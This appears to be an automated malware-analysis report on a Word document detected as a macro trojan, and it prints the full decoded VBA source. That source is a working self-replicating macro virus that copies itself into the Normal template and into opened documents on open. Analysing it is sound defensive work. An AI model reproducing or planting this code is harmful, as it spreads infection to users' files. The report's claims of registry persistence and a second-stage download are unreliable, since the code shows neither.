Verdict: MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code when a document is opened. The script modifies the Normal template and the active document, and the embedded string "Çäåñü áîëüøå íå æèâóò è æèòü íå áóäóò" is likely a marker or part of the malicious payload. The presence of a Document_Open macro and modifications to templates strongly suggests an attempt to establish persistence or prepare for a second-stage download.
Heuristics 3
- ClamAV: Doc.Trojan.Wicked-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Wicked-2
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1517 bytes |

SHA-256: e3aebe7d94f34a673f12ec33e77a06009cca50fe70db15935ef3b71abb20c9a0
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const flag = "Çäåñü âèðóñîâ íåò"
Private Sub Document_Open()
Set x1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x2 = NormalTemplate.VBProject.VBComponents.Item(1)
x3 = x1.CodeModule.Find(flag, 1, 1, 10000, 10000)
x4 = x2.CodeModule.Find(flag, 1, 1, 10000, 10000)
If x4 = False Then
x11 = x1.CodeModule.Lines(1, x1.CodeModule.CountOfLines)
x2.CodeModule.DeleteLines 1, x2.CodeModule.CountOfLines
x2.CodeModule.AddFromString x11
With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "Äîáðûé äîêòîð Àéáîëèò": .Keywords = "": .Comments = "Çëûå âèðóñû çäåñü áîëüøå íå æèâóò è æèòü íå áóäóò": .Execute: End With
NormalTemplate.Save
End If
If x3 = False Then
x11 = x2.CodeModule.Lines(1, x2.CodeModule.CountOfLines)
x1.CodeModule.DeleteLines 1, x1.CodeModule.CountOfLines
x1.CodeModule.AddFromString x11
With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "Äîáðûé äîêòîð Àéáîëèò": .Keywords = "": .Comments = "Çëûå âèðóñû çäåñü áîëüøå íå æèâóò è æèòü íå áóäóò": .Execute: End With
ActiveDocument.Save
End If
End Sub
```